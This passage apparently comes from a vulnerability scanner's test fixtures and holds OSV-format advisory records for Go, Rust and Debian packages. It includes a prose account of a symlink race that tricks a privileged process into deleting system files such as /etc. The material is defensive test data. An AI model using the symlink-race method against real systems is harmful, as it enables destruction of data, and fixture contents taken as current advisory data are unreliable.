"https://pkg.go.dev/vuln/GO-2023-1571" }, "ecosystem_specific": { "imports": [ { "path": "golang.org/x/net/http2" }, { "path": "golang.org/x/net/http2/hpack", "symbols": [ "Decoder.DecodeFull", "Decoder.Write", "Decoder.parseFieldLiteral", "Decoder.readString" ] } ] } } ], "references": [ { "type": "REPORT", "url": "https://go.dev/issue/57855" }, { "type": "FIX", "url": "https://go.dev/cl/468135" }, { "type": "FIX", "url": "https://go.dev/cl/468295" }, { "type": "WEB", "url": "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E" } ] } ], "groups": [ { "ids": [ "GHSA-fxg5-wq6x-vr4w", "GO-2023-1495" ], "aliases": [ "GHSA-fxg5-wq6x-vr4w", "GO-2023-1495" ] }, { "ids": [ "GO-2022-1144" ], "aliases": [ "GO-2022-1144" ] }, { "ids": [ "GHSA-vvpx-j8f3-3w6h", "GO-2023-1571" ], "aliases": [ "GHSA-vvpx-j8f3-3w6h", "GO-2023-1571" ] } ] } ] }, { "source": { "path": "testdata/filter/some/configs/c/", "type": "lockfile" }, "packages": [ { "package": { "name": "ascii", "version": "0.8.7", "ecosystem": "crates.io" }, "vulnerabilities": [ { "schema_version": "1.4.0", "id": "GHSA-mrrw-grhq-86gf", "modified": "2023-02-28T20:30:10Z", "published": "2023-02-28T20:30:10Z", "aliases": null, "summary": "Ascii (crate) allows out-of-bounds array indexing in safe code", "details": "Affected version of this crate had implementation of `From\u003c\u0026mut AsciiStr\u003e` for `\u0026mut [u8]` and `\u0026mut str`. This can result in out-of-bounds array indexing in safe code.\n\nThe flaw was corrected in commit [8a6c779](https://github.com/tomprogrammer/rust-ascii/pull/63/commits/8a6c7798c202766bd57d70fb8d12739dd68fb9dc) by removing those impls.\n", "affected": [ { "package": { "ecosystem": "crates.io", "name": "ascii", "purl": "pkg:cargo/ascii" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.6.0" }, { "fixed": "0.9.3" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/02/GHSA-mrrw-grhq-86gf/GHSA-mrrw-grhq-86gf.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/tomprogrammer/rust-ascii/issues/64" }, { "type": "WEB", "url": "https://github.com/tomprogrammer/rust-ascii/pull/63/commits/8a6c7798c202766bd57d70fb8d12739dd68fb9dc" }, { "type": "PACKAGE", "url": "https://github.com/tomprogrammer/rust-ascii" }, { "type": "WEB", "url": "https://rustsec.org/advisories/RUSTSEC-2023-0015.html" } ], "database_specific": { "cwe_ids": [], "github_reviewed": true, "github_reviewed_at": "2023-02-28T20:30:10Z", "nvd_published_at": null, "severity": "MODERATE" } }, { "schema_version": "1.4.0", "id": "RUSTSEC-2023-0015", "modified": "2023-02-25T15:13:09Z", "published": "2023-02-25T12:00:00Z", "aliases": null, "summary": "Ascii allows out-of-bounds array indexing in safe code", "details": "Affected version of this crate had implementation of `From\u003c\u0026mut AsciiStr\u003e` for `\u0026mut [u8]` and `\u0026mut str`. This can result in out-of-bounds array indexing in safe code.\n\nThe flaw was corrected in commit [8a6c779](https://github.com/tomprogrammer/rust-ascii/pull/63/commits/8a6c7798c202766bd57d70fb8d12739dd68fb9dc) by removing those impls.", "affected": [ { "package": { "ecosystem": "crates.io", "name": "ascii", "purl": "pkg:cargo/ascii" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.6.1-0" }, { "fixed": "0.9.3" } ] } ], "database_specific": { "categories": [ "memory-corruption" ], "cvss": null, "informational": "unsound", "source": "https://github.com/rustsec/advisory-db/blob/osv/crates/RUSTSEC-2023-0015.json" }, "ecosystem_specific": { "affects": { "arch": [], "functions": [], "os": [] } } } ], "references": [ { "type": "PACKAGE", "url": "https://crates.io/crates/ascii" }, { "type": "ADVISORY", "url": "https://rustsec.org/advisories/RUSTSEC-2023-0015.html" }, { "type": "REPORT", "url": "https://github.com/tomprogrammer/rust-ascii/issues/64" } ] } ], "groups": [ { "ids": [ "GHSA-mrrw-grhq-86gf" ], "aliases": [ "GHSA-mrrw-grhq-86gf" ] }, { "ids": [ "RUSTSEC-2023-0015" ], "aliases": [ "RUSTSEC-2023-0015" ] } ] }, { "package": { "name": "remove_dir_all", "version": "0.5.3", "ecosystem": "crates.io" }, "vulnerabilities": [ { "schema_version": "1.4.0", "id": "GHSA-mc8h-8q98-g5hr", "modified": "2023-02-24T16:23:59Z", "published": "2023-02-24T16:23:59Z", "aliases": null, "summary": "Race Condition Enabling Link Following and Time-of-check Time-of-use (TOCTOU) Race Condition in remove_dir_all", "details": "The `remove_dir_all` crate is a Rust library that offers additional features over the Rust standard library `fs::remove_dir_all` function. It suffers the same class of failure as the code it was layering over: TOCTOU race conditions, with the ability to cause arbitrary paths to be deleted by substituting a symlink for a path after the type of the path was checked.\n\nThanks to the Rust security team for identifying the problem and alerting us to it.", "affected": [ { "package": { "ecosystem": "crates.io", "name": "remove_dir_all", "purl": "pkg:cargo/remove_dir_all" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.8.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/02/GHSA-mc8h-8q98-g5hr/GHSA-mc8h-8q98-g5hr.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/XAMPPRocky/remove_dir_all/security/advisories/GHSA-mc8h-8q98-g5hr" }, { "type": "WEB", "url": "https://github.com/XAMPPRocky/remove_dir_all/commit/7247a8b6ee59fc99bbb69ca6b3ca4bfd8c809ead" }, { "type": "PACKAGE", "url": "https://github.com/XAMPPRocky/remove_dir_all" }, { "type": "WEB", "url": "https://rustsec.org/advisories/RUSTSEC-2023-0018.html" } ], "database_specific": { "cwe_ids": [ "CWE-366", "CWE-367" ], "github_reviewed": true, "github_reviewed_at": "2023-02-24T16:23:59Z", "nvd_published_at": null, "severity": "LOW" } }, { "schema_version": "1.4.0", "id": "RUSTSEC-2023-0018", "modified": "2023-03-04T21:50:30Z", "published": "2023-02-24T12:00:00Z", "aliases": [ "GHSA-mc8h-8q98-g5hr" ], "summary": "Race Condition Enabling Link Following and Time-of-check Time-of-use (TOCTOU)", "details": "The remove_dir_all crate is a Rust library that offers additional features over the Rust\nstandard library fs::remove_dir_all function.\n\nIt was possible to trick a privileged process doing a recursive delete in an\nattacker controlled directory into deleting privileged files, on all operating systems.\n\nFor instance, consider deleting a tree called 'etc' in a parent directory\ncalled 'p'. Between calling `remove_dir_all(\"a\")` and remove_dir_all(\"a\")\nactually starting its work, the attacker can move 'p' to 'p-prime', and\nreplace 'p' with a symlink to '/'. Then the privileged process deletes 'p/etc'\nwhich is actually /etc, and now your system is broken. There are some\nmitigations for this exact scenario, such as CWD relative file lookup, but\nthey are not guaranteed - any code using absolute paths will not have that\nprotection in place.\n\nThe same attack could be performed at any point in the directory tree being\ndeleted: if 'a' contains a child directory called 'etc', attacking the\ndeletion by replacing 'a' with a link is possible.\n\nThe new code in this release mitigates the attack within the directory tree\nbeing deleted by using file-handle relative operations: to open 'a/etc', the\npath 'etc' relative to 'a' is opened, where 'a' is represented by a file\ndescriptor (Unix) or handle (Windows). With the exception of the entry points\ninto the directory deletion logic, this is robust against manipulation of the\ndirectory hierarchy, and remove_dir_all will only delete files and directories\ncontained in the tree it is deleting.\n\nThe entry path however is a challenge - as described above, there are some\npotential mitigations, but since using them must be done by the calling code,\nit is hard to be confident about the security properties of the path based\ninterface.\n\nThe new extension trait `RemoveDir` provides an interface where it is much\nharder to get it wrong.\n\n`somedir.remove_dir_contents(\"name-of-child\")`.\n\nCallers can then make their own security evaluation about how to securely get\na directory handle. That is still not particularly obvious, and we're going to\nfollow up with a helper of some sort (probably in the `fs_at` crate). Once\nthat is available, the path based entry points will get deprecated.\n\nIn the interim, processes that might run with elevated privileges should\nfigure out how to securely identify the directory they are going to delete, to\navoid the initial race. Pragmatically, other processes should be fine with the\npath based entry points : this is the same interface `std::fs::remove_dir_all`\noffers, and an unprivileged process running in an attacker controlled\ndirectory can't do anything that the attacker can't already do.", "affected": [ { "package": { "ecosystem": "crates.io", "name": "remove_dir_all", "purl": "pkg:cargo/remove_dir_all" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.0.0-0" }, { "fixed": "0.8.0" } ] } ], "database_specific": { "categories": [], "cvss": null, "informational": null, "source": "https://github.com/rustsec/advisory-db/blob/osv/crates/RUSTSEC-2023-0018.json" }, "ecosystem_specific": { "affects": { "arch": [], "functions": [ "remove_dir_all::ensure_empty_dir", "remove_dir_all::remove_dir_all", "remove_dir_all::remove_dir_contents" ], "os": [] } } } ], "references": [ { "type": "PACKAGE", "url": "https://crates.io/crates/remove_dir_all" }, { "type": "ADVISORY", "url": "https://rustsec.org/advisories/RUSTSEC-2023-0018.html" }, { "type": "WEB", "url": "https://github.com/XAMPPRocky/remove_dir_all/commit/7247a8b6ee59fc99bbb69ca6b3ca4bfd8c809ead" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-mc8h-8q98-g5hr" } ] } ], "groups": [ { "ids": [ "GHSA-mc8h-8q98-g5hr", "RUSTSEC-2023-0018" ], "aliases": [ "GHSA-mc8h-8q98-g5hr", "RUSTSEC-2023-0018" ] } ] }, { "package": { "name": "time", "version": "0.1.45", "ecosystem": "crates.io" }, "vulnerabilities": [ { "schema_version": "1.4.0", "id": "GHSA-wcg3-cvx6-7396", "modified": "2022-12-06T00:16:25Z", "published": "2021-08-25T20:56:46Z", "aliases": [ "CVE-2020-26235" ], "summary": "Segmentation fault in time", "details": "### Impact\n\nUnix-like operating systems may segfault due to dereferencing a dangling pointer in specific circumstances. This requires an environment variable to be set in a different thread than the affected functions. This may occur without the user's knowledge, notably in a third-party library.\n\nThe affected functions from time 0.2.7 through 0.2.22 are:\n\n- `time::UtcOffset::local_offset_at`\n- `time::UtcOffset::try_local_offset_at`\n- `time::UtcOffset::current_local_offset`\n- `time::UtcOffset::try_current_local_offset`\n- `time::OffsetDateTime::now_local`\n- `time::OffsetDateTime::try_now_local`\n\nThe affected functions in time 0.1 (all versions) are:\n\n- `at`\n- `at_utc`\n- `now`\n\nNon-Unix targets (including Windows and wasm) are unaffected.\n\n### Patches\n\nIn some versions of `time`, the internal method that determines the local offset has been modified to always return `None` on the affected operating systems. This has the effect of returning an `Err` on the `try_*` methods and `UTC` on the non-`try_*` methods. In later versions, `time` will attempt to determine the number of threads running in the process. If the process is single-threaded, the call will proceed as its safety invariant is upheld.\n\nUsers and library authors with time in their dependency tree must perform `cargo update`, which will pull in the updated, unaffected code.\n\nUsers of time 0.1 do not have a patch and must upgrade to an unaffected version: time 0.2.23 or greater or the 0.3 series.\n\n### Workarounds\n\nLibrary authors must ensure that the program only has one running thread at the time of calling any affected method. Binary authors may do the same and/or ensure that no other thread is actively mutating the environment.\n\n### References\n\n[time-rs/time#293](https://github.com/time-rs/time/issues/293).", "affected": [ { "package": { "ecosystem": "crates.io", "name": "time", "purl": "pkg:cargo/time" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.1" }, { "last_affected": "0.2" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/08/GHSA-wcg3-cvx6-7396/GHSA-wcg3-cvx6-7396.json" } }, { "package": { "ecosystem": "crates.io", "name": "time", "purl": "pkg:cargo/time" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.2.7" }, { "fixed": "0.2.23" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/08/GHSA-wcg3-cvx6-7396/GHSA-wcg3-cvx6-7396.json" }, "ecosystem_specific": { "affected_functions": [ "time::UtcOffset::local_offset_at", "time::UtcOffset::try_local_offset_at", "time::UtcOffset::current_local_offset", "time::UtcOffset::try_current_local_offset", "time::OffsetDateTime::now_local", "time::OffsetDateTime::try_now_local" ] } } ], "references": [ { "type": "WEB", "url": "https://github.com/time-rs/time/security/advisories/GHSA-wcg3-cvx6-7396" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-26235" }, { "type": "WEB", "url": "https://github.com/time-rs/time/issues/293" }, { "type": "WEB", "url": "https://crates.io/crates/time/0.2.23" }, { "type": "PACKAGE", "url": "https://github.com/time-rs/time" }, { "type": "WEB", "url": "https://rustsec.org/advisories/RUSTSEC-2020-0071.html" } ], "database_specific": { "cwe_ids": [ "CWE-476" ], "github_reviewed": true, "severity": "MODERATE" } }, { "schema_version": "1.4.0", "id": "RUSTSEC-2020-0071", "modified": "2023-02-08T15:06:38Z", "published": "2020-11-18T12:00:00Z", "aliases": [ "CVE-2020-26235" ], "summary": "Potential segfault in the time crate", "details": "### Impact\n\nUnix-like operating systems may segfault due to dereferencing a dangling pointer in specific circumstances. This requires an environment variable to be set in a different thread than the affected functions. This may occur without the user's knowledge, notably in a third-party library.\n\nThe affected functions from time 0.2.7 through 0.2.22 are:\n\n- `time::UtcOffset::local_offset_at`\n- `time::UtcOffset::try_local_offset_at`\n- `time::UtcOffset::current_local_offset`\n- `time::UtcOffset::try_current_local_offset`\n- `time::OffsetDateTime::now_local`\n- `time::OffsetDateTime::try_now_local`\n\nThe affected functions in time 0.1 (all versions) are:\n\n- `at`\n- `at_utc`\n- `now`\n\nNon-Unix targets (including Windows and wasm) are unaffected.\n\n### Patches\n\nPending a proper fix, the internal method that determines the local offset has been modified to always return `None` on the affected operating systems. This has the effect of returning an `Err` on the `try_*` methods and `UTC` on the non-`try_*` methods.\n\nUsers and library authors with time in their dependency tree should perform `cargo update`, which will pull in the updated, unaffected code.\n\nUsers of time 0.1 do not have a patch and should upgrade to an unaffected version: time 0.2.23 or greater or the 0.3 series.\n\n### Workarounds\n\nA possible workaround for crates affected through the transitive dependency in `chrono`, is to avoid using the default `oldtime` feature dependency of the `chrono` crate by disabling its `default-features` and manually specifying the required features instead.\n\n#### Examples:\n\n`Cargo.toml`: \n\n```toml\nchrono = { version = \"0.4\", default-features = false, features = [\"serde\"] }\n```\n\n```toml\nchrono = { version = \"0.4.22\", default-features = false, features = [\"clock\"] }\n```\n\nCommandline: \n\n```bash\ncargo add chrono --no-default-features -F clock\n```\n\nSources: \n - [chronotope/chrono#602 (comment)](https://github.com/chronotope/chrono/issues/602#issuecomment-1242149249) \n - [vityafx/serde-aux#21](https://github.com/vityafx/serde-aux/issues/21)", "affected": [ { "package": { "ecosystem": "crates.io", "name": "time", "purl": "pkg:cargo/time" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.0.0-0" }, { "fixed": "0.2.0" }, { "introduced": "0.2.1-0" }, { "fixed": "0.2.1" }, { "introduced": "0.2.2-0" }, { "fixed": "0.2.2" }, { "introduced": "0.2.3-0" }, { "fixed": "0.2.3" }, { "introduced": "0.2.4-0" }, { "fixed": "0.2.4" }, { "introduced": "0.2.5-0" }, { "fixed": "0.2.5" }, { "introduced": "0.2.6-0" }, { "fixed": "0.2.6" }, { "introduced": "0.2.7-0" }, { "fixed": "0.2.23" } ] } ], "database_specific": { "categories": [ "code-execution", "memory-corruption" ], "cvss": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "informational": null, "source": "https://github.com/rustsec/advisory-db/blob/osv/crates/RUSTSEC-2020-0071.json" }, "ecosystem_specific": { "affects": { "arch": [], "functions": [ "time::OffsetDateTime::now_local", "time::OffsetDateTime::try_now_local", "time::UtcOffset::current_local_offset", "time::UtcOffset::local_offset_at", "time::UtcOffset::try_current_local_offset", "time::UtcOffset::try_local_offset_at", "time::at", "time::at_utc", "time::now" ], "os": [ "linux", "redox", "solaris", "android", "ios", "macos", "netbsd", "openbsd", "freebsd" ] } } } ], "references": [ { "type": "PACKAGE", "url": "https://crates.io/crates/time" }, { "type": "ADVISORY", "url": "https://rustsec.org/advisories/RUSTSEC-2020-0071.html" }, { "type": "REPORT", "url": "https://github.com/time-rs/time/issues/293" } ] } ], "groups": [ { "ids": [ "GHSA-wcg3-cvx6-7396", "RUSTSEC-2020-0071" ], "aliases": [ "GHSA-wcg3-cvx6-7396", "RUSTSEC-2020-0071" ] } ] } ] } ] } ================================================ FILE: pkg/osvscanner/testdata/filter/some/want.json ================================================ { "results": [ { "source": { "path": "testdata/filter/some/configs/a/", "type": "lockfile" }, "packages": [ { "package": { "name": "chromium", "version": "73.0.3683.75-1", "ecosystem": "Debian:10" }, "vulnerabilities": [ { "modified": "2024-05-03T03:16:29Z", "published": "2024-04-17T08:15:10Z", "id": "CVE-2024-3847", "details": "Insufficient policy enforcement in WebUI in Google Chrome prior to 124.0.6367.60 allowed a remote attacker to bypass content security policy via a crafted HTML page. (Chromium security severity: Low)", "affected": [ { "package": { "ecosystem": "Debian:10", "name": "chromium" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" } ] } ], "ecosystem_specific": { "urgency": "low" } }, { "package": { "ecosystem": "Debian:11", "name": "chromium" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" } ] } ], "ecosystem_specific": { "urgency": "low" } } ], "references": [ { "type": "ARTICLE", "url": "https://chromereleases.googleblog.com/2024/04/stable-channel-update-for-desktop_16.html" }, { "type": "WEB", "url": "https://issues.chromium.org/issues/328690293" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CWIVXXSVO5VB3NAZVFJ7CWVBN6W2735T/" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IDLUD644WEWGOFKMZWC2K7Z4CQOKQYR7/" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/M4PCXKCOVBUUU6GOSN46DCPI4HMER3PJ/" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PCWPUBGTBNT4EW32YNZMRIPB3Y4R6XL6/" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UOC3HLIZCGMIJLJ6LME5UWUUIFLXEGRN/" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WEP5NJUWMDRLDQUKU4LFDUHF5PCYAPIO/" } ] } ], "groups": [ { "ids": [ "CVE-2024-3847" ], "aliases": null, "max_severity": "" } ] } ] }, { "source": { "path": "testdata/filter/some/configs/b/", "type": "lockfile" }, "packages": [ { "package": { "name": "golang.org/x/net", "version": "0.1.0", "ecosystem": "Go" }, "vulnerabilities": [ { "modified": "2023-03-09T21:20:44Z", "published": "2023-02-17T14:00:02Z", "schema_version": "1.4.0", "id": "GHSA-vvpx-j8f3-3w6h", "aliases": [ "CVE-2022-41723" ], "summary": "Uncontrolled Resource Consumption", "details": "A maliciously crafted HTTP/2 stream could cause excessive CPU consumption in the HPACK decoder, sufficient to cause a denial of service from a small number of small requests.", "affected": [ { "package": { "ecosystem": "Go", "name": "golang.org/x/net", "purl": "pkg:golang/golang.org/x/net" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.7.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/02/GHSA-vvpx-j8f3-3w6h/GHSA-vvpx-j8f3-3w6h.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-41723" }, { "type": "WEB", "url": "https://go.dev/cl/468135" }, { "type": "WEB", "url": "https://go.dev/cl/468295" }, { "type": "WEB", "url": "https://go.dev/issue/57855" }, { "type": "WEB", "url": "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E" }, { "type": "WEB", "url": "https://pkg.go.dev/vuln/GO-2023-1571" }, { "type": "WEB", "url": "https://vuln.go.dev/ID/GO-2023-1571.json" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2023-02-17T14:00:02Z", "nvd_published_at": "2023-02-28T18:15:00Z", "severity": "HIGH" } }, { "modified": "2023-02-22T20:13:12Z", "published": "2023-02-16T22:31:36Z", "schema_version": "1.4.0", "id": "GO-2023-1571", "aliases": [ "CVE-2022-41723", "GHSA-vvpx-j8f3-3w6h" ], "details": "A maliciously crafted HTTP/2 stream could cause excessive CPU consumption in the HPACK decoder, sufficient to cause a denial of service from a small number of small requests.", "affected": [ { "package": { "ecosystem": "Go", "name": "stdlib", "purl": "pkg:golang/stdlib" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.19.6" }, { "introduced": "1.20.0" }, { "fixed": "1.20.1" } ] } ], "database_specific": { "source": "https://vuln.go.dev/ID/GO-2023-1571.json", "url": "https://pkg.go.dev/vuln/GO-2023-1571" }, "ecosystem_specific": { "imports": [ { "path": "net/http" } ], "urgency": "low" } }, { "package": { "ecosystem": "Go", "name": "golang.org/x/net", "purl": "pkg:golang/golang.org/x/net" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.7.0" } ] } ], "database_specific": { "source": "https://vuln.go.dev/ID/GO-2023-1571.json", "url": "https://pkg.go.dev/vuln/GO-2023-1571" }, "ecosystem_specific": { "imports": [ { "path": "golang.org/x/net/http2" }, { "path": "golang.org/x/net/http2/hpack", "symbols": [ "Decoder.DecodeFull", "Decoder.Write", "Decoder.parseFieldLiteral", "Decoder.readString" ] } ] } } ], "references": [ { "type": "REPORT", "url": "https://go.dev/issue/57855" }, { "type": "FIX", "url": "https://go.dev/cl/468135" }, { "type": "FIX", "url": "https://go.dev/cl/468295" }, { "type": "WEB", "url": "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E" } ] } ], "groups": [ { "ids": [ "GHSA-vvpx-j8f3-3w6h", "GO-2023-1571" ], "aliases": [ "GHSA-vvpx-j8f3-3w6h", "GO-2023-1571" ] } ] } ] }, { "source": { "path": "testdata/filter/some/configs/c/", "type": "lockfile" }, "packages": [ { "package": { "name": "ascii", "version": "0.8.7", "ecosystem": "crates.io" }, "vulnerabilities": [ { "modified": "2023-02-28T20:30:10Z", "published": "2023-02-28T20:30:10Z", "schema_version": "1.4.0", "id": "GHSA-mrrw-grhq-86gf", "summary": "Ascii (crate) allows out-of-bounds array indexing in safe code", "details": "Affected version of this crate had implementation of `From\u003c\u0026mut AsciiStr\u003e` for `\u0026mut [u8]` and `\u0026mut str`. This can result in out-of-bounds array indexing in safe code.\n\nThe flaw was corrected in commit [8a6c779](https://github.com/tomprogrammer/rust-ascii/pull/63/commits/8a6c7798c202766bd57d70fb8d12739dd68fb9dc) by removing those impls.\n", "affected": [ { "package": { "ecosystem": "crates.io", "name": "ascii", "purl": "pkg:cargo/ascii" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.6.0" }, { "fixed": "0.9.3" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/02/GHSA-mrrw-grhq-86gf/GHSA-mrrw-grhq-86gf.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/tomprogrammer/rust-ascii/issues/64" }, { "type": "WEB", "url": "https://github.com/tomprogrammer/rust-ascii/pull/63/commits/8a6c7798c202766bd57d70fb8d12739dd68fb9dc" }, { "type": "PACKAGE", "url": "https://github.com/tomprogrammer/rust-ascii" }, { "type": "WEB", "url": "https://rustsec.org/advisories/RUSTSEC-2023-0015.html" } ], "database_specific": { "cwe_ids": [], "github_reviewed": true, "github_reviewed_at": "2023-02-28T20:30:10Z", "nvd_published_at": null, "severity": "MODERATE" } } ], "groups": [ { "ids": [ "GHSA-mrrw-grhq-86gf" ], "aliases": [ "GHSA-mrrw-grhq-86gf" ] } ] }, { "package": { "name": "time", "version": "0.1.45", "ecosystem": "crates.io" }, "vulnerabilities": [ { "modified": "2022-12-06T00:16:25Z", "published": "2021-08-25T20:56:46Z", "schema_version": "1.4.0", "id": "GHSA-wcg3-cvx6-7396", "aliases": [ "CVE-2020-26235" ], "summary": "Segmentation fault in time", "details": "### Impact\n\nUnix-like operating systems may segfault due to dereferencing a dangling pointer in specific circumstances. This requires an environment variable to be set in a different thread than the affected functions. This may occur without the user's knowledge, notably in a third-party library.\n\nThe affected functions from time 0.2.7 through 0.2.22 are:\n\n- `time::UtcOffset::local_offset_at`\n- `time::UtcOffset::try_local_offset_at`\n- `time::UtcOffset::current_local_offset`\n- `time::UtcOffset::try_current_local_offset`\n- `time::OffsetDateTime::now_local`\n- `time::OffsetDateTime::try_now_local`\n\nThe affected functions in time 0.1 (all versions) are:\n\n- `at`\n- `at_utc`\n- `now`\n\nNon-Unix targets (including Windows and wasm) are unaffected.\n\n### Patches\n\nIn some versions of `time`, the internal method that determines the local offset has been modified to always return `None` on the affected operating systems. This has the effect of returning an `Err` on the `try_*` methods and `UTC` on the non-`try_*` methods. In later versions, `time` will attempt to determine the number of threads running in the process. If the process is single-threaded, the call will proceed as its safety invariant is upheld.\n\nUsers and library authors with time in their dependency tree must perform `cargo update`, which will pull in the updated, unaffected code.\n\nUsers of time 0.1 do not have a patch and must upgrade to an unaffected version: time 0.2.23 or greater or the 0.3 series.\n\n### Workarounds\n\nLibrary authors must ensure that the program only has one running thread at the time of calling any affected method. Binary authors may do the same and/or ensure that no other thread is actively mutating the environment.\n\n### References\n\n[time-rs/time#293](https://github.com/time-rs/time/issues/293).", "affected": [ { "package": { "ecosystem": "crates.io", "name": "time", "purl": "pkg:cargo/time" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.1" }, { "last_affected": "0.2" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/08/GHSA-wcg3-cvx6-7396/GHSA-wcg3-cvx6-7396.json" } }, { "package": { "ecosystem": "crates.io", "name": "time", "purl": "pkg:cargo/time" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.2.7" }, { "fixed": "0.2.23" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/08/GHSA-wcg3-cvx6-7396/GHSA-wcg3-cvx6-7396.json" }, "ecosystem_specific": { "affected_functions": [ "time::UtcOffset::local_offset_at", "time::UtcOffset::try_local_offset_at", "time::UtcOffset::current_local_offset", "time::UtcOffset::try_current_local_offset", "time::OffsetDateTime::now_local", "time::OffsetDateTime::try_now_local" ] } } ], "references": [ { "type": "WEB", "url": "https://github.com/time-rs/time/security/advisories/GHSA-wcg3-cvx6-7396" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-26235" }, { "type": "WEB", "url": "https://github.com/time-rs/time/issues/293" }, { "type": "WEB", "url": "https://crates.io/crates/time/0.2.23" }, { "type": "PACKAGE", "url": "https://github.com/time-rs/time" }, { "type": "WEB", "url": "https://rustsec.org/advisories/RUSTSEC-2020-0071.html" } ], "database_specific": { "cwe_ids": [ "CWE-476" ], "github_reviewed": true, "severity": "MODERATE" } }, { "modified": "2023-02-08T15:06:38Z", "published": "2020-11-18T12:00:00Z", "schema_version": "1.4.0", "id": "RUSTSEC-2020-0071", "aliases": [ "CVE-2020-26235" ], "summary": "Potential segfault in the time crate", "details": "### Impact\n\nUnix-like operating systems may segfault due to dereferencing a dangling pointer in specific circumstances. This requires an environment variable to be set in a different thread than the affected functions. This may occur without the user's knowledge, notably in a third-party library.\n\nThe affected functions from time 0.2.7 through 0.2.22 are:\n\n- `time::UtcOffset::local_offset_at`\n- `time::UtcOffset::try_local_offset_at`\n- `time::UtcOffset::current_local_offset`\n- `time::UtcOffset::try_current_local_offset`\n- `time::OffsetDateTime::now_local`\n- `time::OffsetDateTime::try_now_local`\n\nThe affected functions in time 0.1 (all versions) are:\n\n- `at`\n- `at_utc`\n- `now`\n\nNon-Unix targets (including Windows and wasm) are unaffected.\n\n### Patches\n\nPending a proper fix, the internal method that determines the local offset has been modified to always return `None` on the affected operating systems. This has the effect of returning an `Err` on the `try_*` methods and `UTC` on the non-`try_*` methods.\n\nUsers and library authors with time in their dependency tree should perform `cargo update`, which will pull in the updated, unaffected code.\n\nUsers of time 0.1 do not have a patch and should upgrade to an unaffected version: time 0.2.23 or greater or the 0.3 series.\n\n### Workarounds\n\nA possible workaround for crates affected through the transitive dependency in `chrono`, is to avoid using the default `oldtime` feature dependency of the `chrono` crate by disabling its `default-features` and manually specifying the required features instead.\n\n#### Examples:\n\n`Cargo.toml`: \n\n```toml\nchrono = { version = \"0.4\", default-features = false, features = [\"serde\"] }\n```\n\n```toml\nchrono = { version = \"0.4.22\", default-features = false, features = [\"clock\"] }\n```\n\nCommandline: \n\n```bash\ncargo add chrono --no-default-features -F clock\n```\n\nSources: \n - [chronotope/chrono#602 (comment)](https://github.com/chronotope/chrono/issues/602#issuecomment-1242149249) \n - [vityafx/serde-aux#21](https://github.com/vityafx/serde-aux/issues/21)", "affected": [ { "package": { "ecosystem": "crates.io", "name": "time", "purl": "pkg:cargo/time" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.0.0-0" }, { "fixed": "0.2.0" }, { "introduced": "0.2.1-0" }, { "fixed": "0.2.1" }, { "introduced": "0.2.2-0" }, { "fixed": "0.2.2" }, { "introduced": "0.2.3-0" }, { "fixed": "0.2.3" }, { "introduced": "0.2.4-0" }, { "fixed": "0.2.4" }, { "introduced": "0.2.5-0" }, { "fixed": "0.2.5" }, { "introduced": "0.2.6-0" }, { "fixed": "0.2.6" }, { "introduced": "0.2.7-0" }, { "fixed": "0.2.23" } ] } ], "database_specific": { "categories": [ "code-execution", "memory-corruption" ], "cvss": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "informational": null, "source": 